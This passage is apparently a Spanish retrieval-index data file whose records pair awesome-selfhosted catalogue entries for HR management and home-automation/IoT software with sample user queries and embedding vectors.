-0.11441, 0.07005, 0.02955, -0.12906, 0.07665, -0.06809, 0.01496, -0.0185, 0.04177, -0.07795, 0.08164, 0.11507, -0.00905, 0.03149, 0.01094, -0.03089, 0.05964, -0.18263, -0.05133, -0.05031, -0.09398, 0.01426, -0.04337, -0.05485, -0.03863, -0.019, 0.0492, -0.10264, 0.03202, 0.01476, 0.04099, 0.06811, 0.09508, 0.10577, -0.04228, -0.01316, 0.06053, -0.12346, -0.01608, -0.02555, -0.02026, 0.07743, 0.03595, -0.00203, 0.10263, -0.00386, 0.06231, 0.04348, 0.03413, -0.11936, 0.04754, -0.0356, -0.06564, 0.01688, 0.00668, 0.03575, 0.04128, -0.01097, -0.07323, 0.00248, -0.09237, -0.00861, 0.03694, 0.02647, 0.03569, -0.07595, 0.0869, 0.0262, -0.04763, 0.01267, 0.04801, -0.13122, 0.1311, 0.082, -0.01476, 0.05704, -0.04028, -0.06135, -0.0396, -0.02744, 0.06479, -0.05477, -0.06256, 0.00291, -0.06281, -0.06717, 0.02624, -0.04379, -0.04449, 0.09037, -0.01024, 0.06583, -0.04145, 0.07672, 0.15798, 0.04996, -0.02314, -0.00289, -0.04428, -0.0386, 0.10914, -0.01759, -0.02053, -0.06185, 0.00795, -0.01785, -0.05655, -0.11901, 0.09116, -0.00404, -0.02731, 0.06452, -0.00449, 0.0608, -0.04359, -0.01174, -0.02827, -0.06441, -0.05496, -0.01432, 0.00107, -0.10813, 0.02803, -0.04706, -0.04125, -0.03341, 0.01025, 0.0284, 0.01091, -0.04574, 0.12812, -0.00441, -0.01606, 0.00034, -0.00823, 0.02995, 0.0486, 0.00046, 0.00458, 0.06856, -0.05121, 0.03629, -0.04436, -0.0293, -0.08331, 0.07413, 0.07481, 0.0063, 0.06402, -0.03417, 0.00726, 0.02637, -0.02096, 0.02676, 0.01705, -0.01925, 0.0398, 0.02734, 0.06101, 0.02556, -0.01823, 0.02355, 0.01508, -0.02885, -0.02632, 0.00552, 0.00745, 0.01538, -0.03156, -0.02848, -0.01633, 0.04357, 0.02214, -0.00344, 0.05673, 0.05153, 0.02817, 0.05691, -0.01345, 0.06397, -0.00564, -0.09232, 0.05161, 0.02718, -0.00408, 0.03742, -0.06677, 0.05258, 0.01258, 0.02828, 4e-05, 0.01632, -0.01137, 0.01317, -0.01698, 0.03321, 0.01539, -0.00309, -0.00792, 0.01827, -0.00745, -0.03559, -0.0588, -0.00059, -0.00515, -0.00158, -0.08223, 0.04568, 0.08917, -0.01549, -0.05489, -0.03213, -0.06722, -0.01526, -0.02335, -0.05268, -0.05585, -0.01212, -0.00612, 3e-05, -0.0064, -0.02674, -0.03481]} -{"tipo": "pregunta", "herramienta": "Human Resources Management (HRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Human Resources Management (HRM)", "tema": "human resources management (hrm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Human Resources Management (HRM): admidio β€” User management system for websites of organizations and groups. The system has a flexible role model so that it’s possible to reflect the structure and permissions of your organization [GPL-2.0, PHP/Docker]. Frappe HR β€” Complete HRMS solution with over 13 different modules right from employee management, onboarding, leaves, to payroll, taxation, and more [GPL-3.0, Docker/Python/Nodejs]. MintHCM β€” Tool for Human Capital Management based on two popular, well-known business applications SugarCRM Community Edition and SuiteCRM [AGPL-3.0, PHP].", "indexar": "cual es una alternativa libre a los software tradicionales de recursos humanos", "v": [0.00367, 0.06367, -0.01613, -0.12979, -0.07207, 0.01895, -0.00178, -0.05397, -0.08118, -0.04637, -0.04802, -0.09468, 0.06785, 0.00113, 0.07529, -0.06167, 0.12449, -0.05377, 0.1002, 0.00408, -0.08996, -0.05315, -0.1414, -0.01855, -0.03611, -0.17587, 0.04625, 0.02832, -0.06039, 0.0522, 0.11471, 0.04699, 0.07725, -0.06568, -0.15367, 0.08206, 0.02636, 0.09978, -0.05528, -0.12473, 0.09674, -0.07103, -0.00493, 0.02978, -0.01185, -0.02814, -0.07727, 0.02505, -0.02691, 0.03308, -0.09049, 0.01136, -0.09057, -0.04203, 0.12153, -0.13094, 0.0676, -0.06429, -0.11949, -0.04316, -0.12738, 0.17689, 0.12201, -0.05956, -0.00785, 0.08677, -0.04647, -0.02091, -0.16405, 0.04861, 0.0701, 0.02219, 0.01904, -0.03286, -0.02211, 0.01179, -0.05577, 0.04042, -0.00657, -0.05859, -0.06915, 0.00045, -0.02432, 0.05844, -0.05348, -0.08283, 0.1609, -0.06365, 0.05724, -0.06259, 0.00057, 0.02402, 0.05278, 0.07098, 0.07488, -0.02015, 0.04589, 0.1531, -0.03091, 0.18553, -0.04401, -0.05343, -0.0843, 0.0144, -0.00514, -0.02687, 0.03193, -0.01291, -0.08072, 0.02307, -0.01102, 0.00539, 0.04636, 0.11859, -0.01114, -0.02359, -0.04323, -0.07021, 0.04086, -0.04401, -0.03275, 0.00191, -0.09922, -0.09063, -0.00981, -0.02106, 0.04405, 0.08477, 0.03013, -0.00432, 0.05584, -0.06594, -0.04889, -0.0892, -0.03575, -0.061, 0.10938, -0.04647, 0.09266, -0.02099, 0.00359, 0.00036, 0.04661, -0.05492, 0.08491, -0.04286, -0.02377, -0.04571, 0.01203, -0.05778, -0.05127, -0.00034, 0.0314, 0.068, -0.0763, -0.02437, -0.02344, 0.08858, -0.10199, 0.09034, -0.00303, -0.02261, -0.01228, -0.02081, 0.01695, -0.04999, 0.02616, -0.03194, -0.02829, 0.0154, 0.02516, 0.09189, 0.06833, -0.04078, -0.04612, -0.0744, -0.0595, -0.095, 0.04013, -0.02553, 0.01205, 0.00673, -0.08204, -0.07265, 0.03519, -0.04762, -0.01138, 0.01888, 0.01187, 0.05119, -0.05247, 0.07349, -0.04502, -0.07947, -0.01799, -0.00186, -0.08496, -0.00603, -0.05155, -0.02416, -0.06457, 0.05011, -0.04331, -0.0308, -0.03818, 0.07883, 0.0433, -0.00768, -0.01906, 0.07491, -0.00902, -0.00513, 0.11886, 0.0219, -0.0763, -0.01632, 0.03228, -0.02407, 0.00328, -0.03634, 0.02173, -0.01848, 0.04903, 0.0471, -0.00524, -0.00483, 0.05508, 0.06162, -0.00844, 0.0172, -0.01817, 0.02275, -0.01473, -0.03352, 0.02343, 0.09268, -0.03912, -0.02933, -0.0425, -0.03723, 0.01592, 0.12266, -0.06531, -0.06169, -0.00625, -0.01331, -0.07582, -0.0465, 0.00295, -0.02038, -0.0671, 0.07471, 0.01797, 0.01215, 0.00169, -0.00472]} -{"tipo": "pregunta", "herramienta": "Human Resources Management (HRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Human Resources Management (HRM)", "tema": "human resources management (hrm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Human Resources Management (HRM): admidio β€” User management system for websites of organizations and groups. The system has a flexible role model so that it’s possible to reflect the structure and permissions of your organization [GPL-2.0, PHP/Docker]. Frappe HR β€” Complete HRMS solution with over 13 different modules right from employee management, onboarding, leaves, to payroll, taxation, and more [GPL-3.0, Docker/Python/Nodejs]. MintHCM β€” Tool for Human Capital Management based on two popular, well-known business applications SugarCRM Community Edition and SuiteCRM [AGPL-3.0, PHP].", "indexar": "con que programa puedo gestionar el onboarding, vacaciones y nΓ³mina de mi equipo", "v": [0.13407, 0.12485, -0.14361, -0.18364, 0.0184, -0.01531, -0.04297, -0.01125, -0.05646, -0.20065, -0.0335, -0.08376, 0.08456, -0.01291, -0.07098, 0.11477, 0.11502, 0.00313, 0.01049, 0.11644, 0.01716, 0.03784, 0.06773, 0.08143, 0.06999, 0.06926, 0.06631, -0.0229, -0.03047, -0.05323, 0.06336, -0.03867, 0.08285, -0.15309, 0.12166, 0.05633, 0.00969, 0.00634, 0.02155, -0.03024, -0.02643, 0.07922, -0.06905, 0.03159, 0.1843, -0.03423, 0.11619, -0.01517, 0.00157, -0.13207, -0.02019, -0.01793, 0.03013, -0.05248, -0.06633, 0.00315, 0.0312, -0.11262, -0.05543, 0.03872, -0.07262, 0.04012, -0.07759, 0.06729, 0.08803, 0.08851, 0.07627, -0.04403, -0.05202, 0.02971, -0.0632, -0.1045, -0.00068, -0.04444, 0.00609, -0.02893, 0.08022, 0.05383, 0.09465, -0.08806, -0.02145, 0.03606, -0.02006, 0.01768, -0.06006, 0.0244, -0.02655, 0.02234, 0.00821, 0.0203, 0.05417, 0.00679, -0.08524, -0.09875, -0.0942, 0.02522, 0.11609, -0.0181, 0.06368, 0.07807, 0.00255, 0.06522, -0.01666, 0.15244, -0.08713, 0.15061, 0.13553, -0.07267, -0.00591, 0.04338, 0.01429, -0.06684, -0.04469, -0.04605, -0.02656, 0.04539, -0.05305, -0.07327, 0.08521, -0.03435, -0.052, -0.03806, 0.03209, 0.0265, 0.14831, -0.04426, -0.00072, -0.02408, 0.01141, 0.05113, -0.0453, 0.00188, -0.07087, 0.04309, -0.09305, -0.08063, 0.00295, 0.03915, 0.02133, -0.08487, -0.11346, 0.15061, 0.06964, -0.04554, 0.03728, 0.02906, 0.00904, -0.03646, 0.05535, 0.07432, -0.04651, 0.00726, -0.01487, 0.03839, -0.07427, 0.04927, 0.09977, 0.00904, -0.06535, -0.074, -0.00709, -0.09492, -0.01378, 0.09855, 0.13325, -0.07042, 0.01279, 0.00434, 0.01339, 0.13919, -0.01902, 0.06869, 0.0688, -0.03634, 0.07057, -0.02554, 0.01661, -0.07706, -0.04581, 0.02823, -0.05251, 0.04664, -0.01114, 0.02061, -0.03098, -0.015, -0.13809, 0.06895, -0.03913, -0.00819, -0.06096, -0.00765, -0.0104, 0.02054, -0.01317, -0.04039, -0.01742, 0.0139, 0.02082, -0.02967, 0.00262, 0.04056, 0.04182, 0.03836, -0.00398, 0.04306, -0.0693, 0.05324, 0.03079, 0.08062, -0.00872, 0.00888, -0.0041, -0.01921, -0.01338, -0.00242, -0.00389, 0.05552, 0.03833, 0.04863, 0.03601, 0.05872, 0.04795, 0.04267, -0.0573, -0.03971, 0.06226, 0.03724, -0.01881, -0.00599, -0.01325, 0.0006, -0.00155, -0.06474, -0.02455, 0.01625, -0.00292, -0.0133, -0.03987, 0.02778, 0.03393, 0.02219, 0.01304, -0.00344, -0.04155, -0.01313, -0.0221, 0.01109, -0.03392, -0.01581, -0.0542, 0.01665, 0.00076, -0.05781, 0.04282, 0.0126]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): Domoticz β€” Home Automation System that lets you monitor and configure various devices like: Lights, Switches, various sensors/meters like Temperature, Rain, Wind, UV, Electra, Gas, Water and much more [GPL-3.0, C/C++/Docker/Shell]. EMQX β€” Scalable MQTT broker. Connect 100M+ IoT devices in one single cluster, move and process real-time IoT data with 1M msg/s throughput at 1ms latency [Apache-2.0, Docker/Erlang]. evcc β€” Extensible Electric Vehicle Charge Controller and home energy management system [MIT, deb/Docker/Go]. FHEM β€” Automate common tasks in the household like switching lamps and heating. It can also be used to log events like temperature or power consumption. You can control it via web or smartphone frontends, telnet or TCP/IP directly [GPL-3.0, Perl]. FlowForge β€” Deploy Node-RED applications in a reliable, scalable and secure manner. The FlowForge platform provides DevOps capabilities for Node-RED development teams [Apache-2.0, Nodejs/Docker/K8S].", "indexar": "que programa me sirve para gestionar la automatizaciΓ³n del hogar con sensores de temperatura y luces?", "v": [0.1411, -0.02923, -0.11864, -0.23945, -0.00533, -0.04342, -0.13914, -0.02983, -0.02783, -0.02413, -0.19986, -0.04849, 0.04669, -0.0088, 0.09367, -0.01187, 0.14828, -0.11143, 0.00418, 0.09616, -0.01469, 0.07043, -0.1371, -0.13566, -0.08922, 0.01315, 0.12388, -0.09702, -0.07923, 0.07542, -0.01235, -0.03174, 0.06537, -0.03167, -0.05069, -0.05244, -0.01677, 0.00974, 0.07147, 0.04421, -0.02517, 0.00659, 0.08903, -0.06374, 0.11905, -0.06124, 0.1323, -0.04032, 0.00955, -0.09246, -0.10478, -0.01, 0.06213, 0.04005, -0.03565, -0.04132, 0.02393, -0.00389, 0.09859, -0.11839, 0.01535, 0.0451, 0.09281, 0.04439, -0.00455, -0.02138, 0.02642, 0.02931, 0.0358, 0.00095, -0.02519, 0.00511, -0.03769, -0.02219, 0.06112, 0.0251, -0.03447, 0.01012, 0.03028, -0.06044, 0.03213, 0.03826, -0.03893, 0.02875, 0.0781, -0.12988, 0.03999, -0.05259, -0.00356, -0.04177, -0.06731, 0.05092, 0.12952, -0.00138, 0.15056, 0.00986, 0.14014, 0.02394, -0.01183, 0.13869, 0.07539, -0.06541, -0.05158, 0.1712, 0.05035, 0.04083, 0.11819, -0.02024, 0.05264, -0.09861, -0.06414, 0.01955, -0.04099, -0.01711, -0.04909, 0.07693, -0.05051, -0.12676, 0.00275, -0.03006, -0.11623, 0.00792, 0.15372, -0.01511, 0.03331, -0.01152, -0.01159, -0.01184, -0.01141, 0.0981, -0.04336, -0.09991, 0.00196, 0.00389, -0.05132, 0.024, -0.06167, -0.02759, -0.06796, -0.06717, -0.08661, 0.10947, 0.08926, -0.02209, 0.08688, -0.01975, 0.03883, 0.01391, 0.02217, 0.059, -0.02511, -0.07661, 0.00635, 0.0442, -0.02008, 0.01142, 0.04816, -0.08007, -0.08124, -0.03341, -0.02547, 0.06468, -0.01593, -0.07153, 0.02761, 0.06702, 0.05998, 0.02492, 0.11742, 0.06397, -0.02985, 0.09445, -0.04312, 0.08345, 0.01672, -0.00032, -0.02299, -0.08539, 0.04829, -0.02216, -0.02046, 0.05671, 0.05269, -0.03575, 0.01814, 0.10768, -0.02196, 0.02827, -0.01187, -0.01328, -0.06274, 0.00879, -0.05858, 0.04947, 0.06712, 0.00208, 0.06123, 0.00766, -0.00637, -0.00506, -0.015, 0.01064, 0.03164, 0.00626, -0.01386, 0.07038, -0.03387, 0.02087, 0.09015, 0.0141, -0.04006, -0.0015, 0.03171, -0.01165, -0.01854, 0.01078, -0.00706, 0.01756, 0.0353, -0.00153, 0.06437, -0.0524, -0.02887, 0.03683, -0.01218, -0.00363, 0.07433, 0.03829, -0.03559, -0.06661, -0.068, -0.02151, 0.03265, 0.02536, 0.01503, -0.02747, -0.0395, -0.0476, -0.01641, -0.04249, -0.02807, 0.07068, 0.01864, -0.05459, -0.01093, 0.00561, 0.00333, 0.03267, -0.01137, -0.02951, -0.03803, -0.01064, -0.03061, -0.00997, 0.0111, -0.00398]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): Domoticz β€” Home Automation System that lets you monitor and configure various devices like: Lights, Switches, various sensors/meters like Temperature, Rain, Wind, UV, Electra, Gas, Water and much more [GPL-3.0, C/C++/Docker/Shell]. EMQX β€” Scalable MQTT broker. Connect 100M+ IoT devices in one single cluster, move and process real-time IoT data with 1M msg/s throughput at 1ms latency [Apache-2.0, Docker/Erlang]. evcc β€” Extensible Electric Vehicle Charge Controller and home energy management system [MIT, deb/Docker/Go]. FHEM β€” Automate common tasks in the household like switching lamps and heating. It can also be used to log events like temperature or power consumption. You can control it via web or smartphone frontends, telnet or TCP/IP directly [GPL-3.0, Perl]. FlowForge β€” Deploy Node-RED applications in a reliable, scalable and secure manner. The FlowForge platform provides DevOps capabilities for Node-RED development teams [Apache-2.0, Nodejs/Docker/K8S].", "indexar": "cual es una alternativa libre a las soluciones domΓ³ticas que permita controlar electrodomΓ©sticos desde un mΓ³vil?", "v": [-0.00779, 0.02136, 0.03372, 0.02573, 0.02482, -0.00436, 0.03033, 0.0215, -0.14366, -0.10899, -0.18476, -0.16177, 0.05841, -0.02212, 0.06922, -0.14295, 0.14796, -0.13146, -0.00899, -0.02451, -0.06977, -0.09209, -0.1128, -0.06558, 0.04269, 0.04757, 0.02076, 0.00208, -0.13588, 0.03162, 0.03358, -0.07667, 0.0997, -0.00804, -0.03054, 0.00566, 0.12439, -0.03002, 0.16561, -0.00586, 0.05996, -0.09081, -0.01264, -0.01461, 0.03853, -0.04298, -0.0372, -0.01225, 0.00997, -0.01766, -0.16124, 0.04773, -0.00757, 0.09727, 0.02142, -0.03289, 0.1469, -0.10547, 0.05634, -0.12833, -0.037, 0.05763, 0.12768, 0.06465, -0.00183, 0.01031, -0.06238, 0.01837, -0.07679, 0.00492, 0.09722, -0.0079, -0.01748, 0.02609, -0.04779, -0.02668, -0.14032, -0.01159, 0.05012, -0.01043, 0.08305, -0.12518, -0.06098, -0.0192, 0.05439, -0.08649, 0.02094, -0.1207, -0.0696, -0.08061, 0.08238, 0.00311, 0.01964, 0.11555, 0.04911, -0.09411, 0.10849, 0.11532, 0.01376, 0.08706, 0.14032, -0.02956, -0.14858, 0.0694, 0.00982, -0.10169, 0.041, -0.02555, -0.05618, -0.04523, -0.09931, 0.03079, 0.07223, -0.0562, -0.05605, -0.01233, -0.06868, -0.00434, -0.04622, -0.06287, 0.00224, -0.07131, 0.09217, -0.09313, 0.10059, 0.04682, 0.11213, 0.01969, 0.02361, 0.05589, 0.12546, -0.06255, 0.03124, -0.07423, -0.04399, -0.02562, 0.0105, -0.02214, -0.01672, 0.03061, 0.01439, 0.0777, 0.03624, -0.07895, 0.08782, -0.03552, -0.0561, 0.02288, 0.0089, 0.02166, -0.07243, 0.06344, -0.01272, 0.06691, -0.02151, 0.0985, -0.10547, -0.03421, -0.05493, 0.06102, -0.03925, -0.02493, -0.00429, -0.03838, -0.05223, -0.02806, 0.0038, 0.0277, -0.03803, 0.03599, -0.10695, 0.1043, -0.02427, -0.00049, -8e-05, -0.04108, 0.08063, -0.0527, 0.00212, -0.04584, -0.03098, 0.07286, -0.0826, -0.02107, -0.00019, -0.01022, 0.01292, -0.01177, 0.02004, 0.02904, -0.01628, 0.03562, -0.03197, -0.06128, 0.01996, -0.03246, 0.00227, -0.02444, -0.00738, 0.00213, -0.03103, -0.02425, 0.06642, 0.01547, 0.00997, 0.02765, -0.00776, 0.02794, 0.02293, 0.01423, 0.03143, -0.01563, 0.10326, 0.02702, -0.04472, 0.00362, -0.04314, 0.0209, -0.03395, 0.01399, 0.11136, 0.02451, -0.01878, -0.00735, -0.03665, 0.10124, 0.03674, 0.00972, -0.01145, -0.01243, -0.01214, -0.039, 0.03682, 0.02684, 0.02502, -0.00274, 0.0082, -0.06087, -0.00261, 0.04033, -0.01087, 0.06704, -0.03799, -0.00491, -0.03851, -0.02504, -0.09956, 0.01825, -0.00805, -0.03081, 0.02004, 0.05499, 0.03436, -0.01946, 0.01766, -0.0042]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): Domoticz β€” Home Automation System that lets you monitor and configure various devices like: Lights, Switches, various sensors/meters like Temperature, Rain, Wind, UV, Electra, Gas, Water and much more [GPL-3.0, C/C++/Docker/Shell]. EMQX β€” Scalable MQTT broker. Connect 100M+ IoT devices in one single cluster, move and process real-time IoT data with 1M msg/s throughput at 1ms latency [Apache-2.0, Docker/Erlang]. evcc β€” Extensible Electric Vehicle Charge Controller and home energy management system [MIT, deb/Docker/Go]. FHEM β€” Automate common tasks in the household like switching lamps and heating. It can also be used to log events like temperature or power consumption. You can control it via web or smartphone frontends, telnet or TCP/IP directly [GPL-3.0, Perl]. FlowForge β€” Deploy Node-RED applications in a reliable, scalable and secure manner. The FlowForge platform provides DevOps capabilities for Node-RED development teams [Apache-2.0, Nodejs/Docker/K8S].", "indexar": "con quΓ© puedo montar un servidor escalable para conectar miles de dispositivos IoT y procesar sus datos en tiempo real?", "v": [-0.02369, 0.05324, -0.25607, -0.13299, 0.00033, -0.11297, -0.03631, -0.05502, -0.0941, -0.02757, -0.11976, -0.12703, 0.06499, -0.0071, 0.03437, 0.04808, 0.15033, -0.10273, -0.03598, -0.10614, -0.0297, -0.0029, -0.0536, -0.03969, -0.07738, 0.16311, 0.03293, 0.06475, -0.16459, -0.00054, 0.01459, -0.01998, 0.06249, 0.00739, -0.09078, -0.14525, -0.04847, 0.18277, -0.00336, -0.06519, 0.0636, 0.02307, -0.04284, 0.06995, 0.15725, -0.00148, 0.0372, -0.0738, -0.02762, -0.0638, -0.12277, 0.01584, -0.08149, 0.03258, -0.12673, 0.0028, 0.17411, -0.1178, 0.17827, -0.05846, -0.15014, 0.01053, -0.03472, -0.04018, 0.0349, -0.01392, -0.07197, 0.06399, -0.08538, -0.03018, -0.05016, 0.0021, -0.02851, 0.01192, 0.09852, 0.0982, 0.01238, -0.0148, 0.08735, 0.05259, -0.0328, -0.00717, 0.02486, 0.06183, -0.03124, 0.02908, 0.02359, -0.01749, 0.04731, 0.03724, 0.02983, 0.11921, 0.00036, -0.05279, 0.0301, -0.01676, 0.0833, -0.01999, 0.02629, 0.07704, -0.00393, 0.07719, -0.10742, 0.14812, 0.01749, 0.04093, 0.08419, -0.03176, 0.02578, -0.08072, -0.03209, -0.01525, -0.05862, -0.05739, -0.03195, -0.05444, -0.00668, -0.09438, -0.05168, 0.08339, -0.04442, -0.00777, 0.11298, 0.04179, 0.01712, -0.00662, 0.00722, 0.01588, 0.05019, -0.05078, 0.04962, -0.01326, -0.06745, -0.0888, -0.02164, 0.06057, -0.01548, -0.11019, 0.03821, -0.05827, 0.05027, 0.04117, -0.08453, -0.01303, 0.06467, -0.04384, 0.00056, -0.01117, -0.05049, 0.03903, 0.0446, 0.07675, -0.04621, 0.04626, -0.08215, -0.05083, 0.02522, -0.07658, -0.055, 0.03871, -0.00554, 0.06376, -0.01496, 0.00464, 0.00581, -0.01058, 0.0025, 0.06835, 0.14138, 0.00688, -0.0809, 0.07344, 0.00882, -0.00213, 0.02121, 0.00949, -0.03255, -0.03605, 0.00822, -0.03425, -0.04085, -0.01648, 0.04021, -0.03207, 0.02331, 0.0386, 0.01487, -0.04112, -0.02997, 0.06037, 0.01912, 0.03667, 0.04707, 0.0798, 0.0591, -0.11833, -0.00422, -0.01438, -0.02027, 0.03604, -0.03623, -0.03252, -0.02011, 0.04564, 0.00665, 0.02898, -0.03711, 0.05789, 0.02945, 0.03032, 0.00754, -0.03796, 0.07505, -0.03614, -0.03465, 0.00397, 0.02793, -0.01888, -0.02468, 0.0126, -0.01078, 0.0304, 0.02408, -0.0034, -0.02995, 0.0334, 0.0041, 0.01141, 0.0127, -0.06899, -0.02698, 0.0242, 0.00807, -0.01141, -0.00447, -0.0054, 0.02002, -0.03937, -0.02079, -0.03467, 0.00043, 0.09856, -0.00877, -0.02027, -0.00903, -0.07013, -0.09558, 0.02291, -0.02656, -0.09474, -0.06059, -0.01835, 0.05101, -0.04288, -0.00896, -0.01233]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): FMD Server β€” A server to communicate with the FMD (Find My Device) Android app, to locate and control your devices [GPL-3.0, Docker/Go]. Gladys β€” Privacy-first home assistant [Apache-2.0, Nodejs/Docker]. Home Assistant β€” Home automation platform [Apache-2.0, Python/Docker]. ioBroker β€” Integration platform for the Internet of Things, focused on building automation, smart metering, ambient assisted living, process automation, visualization and data logging [MIT, Nodejs]. LHA β€” Light Home Automation application that is fully extensible using Blockly, HTML or Lua. It includes extensions such as ConBee, Philips Hue or Z-Wave JS [MIT, Lua]. Node RED β€” Browser-based flow editor that helps you wiring hardware devices, APIs and online services to create IoT solutions [Apache-2.0, Nodejs/Docker]. Onloc β€” Track and share your location in real time. Control and lock stolen or lost phones [AGPL-3.0, Docker]. openHAB β€” Vendor and technology agnostic open source software for home automation [EPL-2.0, Java].", "indexar": "que programa puedo usar para automatizar mi casa de forma privada?", "v": [-0.08819, 0.09717, -0.13483, -0.11895, -0.03787, 0.00289, -0.02404, -0.08676, -0.20849, -0.07922, -0.04944, -0.11054, 0.04833, 0.00431, -0.07377, -0.04936, 0.10969, -0.09345, 0.03836, 0.12582, 0.03218, -0.0203, -0.05112, -0.0457, -0.09938, 0.04668, 0.20346, -0.04296, -0.18419, 0.00394, -0.00611, 0.07315, 0.04481, -0.06263, 0.02573, -0.05077, 0.11005, 0.01504, 0.02824, 0.02812, 0.10125, 0.0611, -0.00758, 0.08862, 0.16232, 0.07736, 0.03644, -0.05942, -0.08183, -0.03623, -0.10373, -0.12643, 0.00844, 0.03308, 0.05918, -0.12347, 0.05469, -0.16305, 0.05566, 0.06857, -0.02017, -0.03004, 0.05477, 0.14171, -0.00438, -0.04676, 0.08462, -0.01556, -0.06902, -0.00028, 0.01225, 0.00328, -0.04179, 0.0191, 0.00599, 0.0656, -0.05739, -0.0853, 0.04819, -0.03034, -0.07587, -0.04245, -0.02542, 0.03923, -0.01207, -0.03787, 0.01541, -0.04688, 0.05031, -0.05484, -0.03295, -0.00468, 0.04951, 0.0869, 0.04659, -0.07771, 0.10906, 0.07674, -0.03385, -0.0099, 0.14074, -0.03733, -0.05215, 0.18566, 0.01855, -0.0095, 0.05561, -0.00582, -0.05148, -0.03312, -0.03697, 0.09213, -0.08531, -0.02232, -0.05346, 0.02163, -0.0651, -0.04407, 0.03624, -0.08933, -0.07332, -0.0023, 0.00099, -0.06725, 0.04091, -0.06383, 0.02517, 0.10444, -0.11215, 0.07676, -0.03136, 0.02421, -0.05515, -0.06008, 0.03242, 0.01739, -0.09008, -0.06115, -0.00919, -0.07397, 0.03711, 0.09885, -0.00213, -0.07473, 0.07232, -0.04301, -0.0701, -0.06057, -0.02431, 0.03592, -0.00023, 0.05924, -0.0029, -0.01246, -0.04216, 0.01997, 0.05635, 0.0069, -0.00364, 0.04046, -0.08014, 0.01135, -0.08081, -0.09556, 0.01464, 0.03788, 0.09792, 0.00191, -0.01223, 0.08378, -0.00347, 0.11187, -0.02571, -0.05434, -0.01649, -0.00459, 0.0095, -0.03233, -0.0476, -0.04382, -0.03198, 0.06635, -0.00591, -0.0387, 0.00644, 0.04076, 0.01099, 0.04775, 0.00495, -0.01763, -0.13959, -0.00231, 0.02181, 0.02917, -0.00614, -0.00823, -0.05761, 0.00733, 0.07261, -0.08758, -0.05372, -0.00788, 0.02078, 0.01644, 0.04416, 0.07453, 0.00993, -0.05505, 0.07735, 0.0688, 0.00857, -0.03539, 0.10057, 0.00298, -0.01687, 0.05661, -0.04327, 0.00707, 0.07144, 0.03588, 0.04537, 0.0168, -0.0199, -0.00856, 0.04224, -0.03004, 0.0231, 0.00034, -0.00201, 0.02178, -0.05887, -0.00843, 0.0284, -0.00999, 0.02354, -0.0569, -0.00872, -0.05685, -0.02506, -0.07524, 0.00788, 0.11256, 0.03062, 0.00261, -0.02885, -0.0312, -0.06361, 0.01073, 0.01512, -0.00482, -0.00385, 0.01055, 0.0268, -0.04041, 0.03261, 0.09771]} -{"tipo": "pregunta", "herramienta": "Internet of Things (IoT)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Internet of Things (IoT)", "tema": "internet of things (iot)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Internet of Things (IoT): FMD Server β€” A server to communicate with the FMD (Find My Device) Android app, to locate and control your devices [GPL-3.0, Docker/Go]. Gladys β€” Privacy-first home assistant [Apache-2.0, Nodejs/Docker]. Home Assistant β€” Home automation platform [Apache-2.0, Python/Docker]. ioBroker β€” Integration platform for the Internet of Things, focused on building automation, smart metering, ambient assisted living, process automation, visualization and data logging [MIT, Nodejs]. LHA β€” Light Home Automation application that is fully extensible using Blockly, HTML or Lua. It includes extensions such as ConBee, Philips Hue or Z-Wave JS [MIT, Lua]. Node RED β€” Browser-based flow editor that helps you wiring hardware devices, APIs and online services to create IoT solutions [Apache-2.0, Nodejs/Docker]. Onloc β€” Track and share your location in real time. Control and lock stolen or lost phones [AGPL-3.0, Docker]. openHAB β€” Vendor and technology agnostic open source software for home automation [EPL-2.0, Java].", "indexar": "cual es la mejor herramienta gratuita para controlar mis dispositivos inteligentes y conectarlos entre sΓ­?", "v": [-0.00417, 0.12404, -0.19229, -0.11507, 0.09407, -0.17451, -0.197, 0.02295, -0.09449, -0.06369, -0.09289, -0.06739, -0.01475, -0.04561, 0.07336, -0.00844, 0.08609, -0.1081, -0.03488, -0.05714, -0.01766, -0.02343, -0.08564, -0.10933, -0.07063, 0.01886, 0.01561, 0.02891, -0.18125, 0.03055, -0.04266, -0.06264, 0.08295, 0.00561, -0.10283, -0.05138, -0.07765, 0.14087, 0.07506, 0.05353, -0.08602, 0.04118, 0.02443, 0.03406, 0.14298, 0.0033, 0.02244, -0.01652, 0.07808, 0.10463, -0.15875, -0.03243, -0.07636, 0.03629, -0.07718, -0.10909, 0.14693, -0.11329, 0.04631, -0.13439, -0.10021, 0.01228, -0.0275, 0.04191, 0.00396, -0.05418, -0.02285, -0.02107, -0.1184, 0.02693, 0.08376, 0.02795, -0.00824, 0.06641, 0.01272, 0.15246, -0.05913, 0.00927, 0.11797, 0.0594, 0.07294, -0.10983, -0.03035, -0.0178, -0.01349, -0.06043, -0.00612, -0.05009, 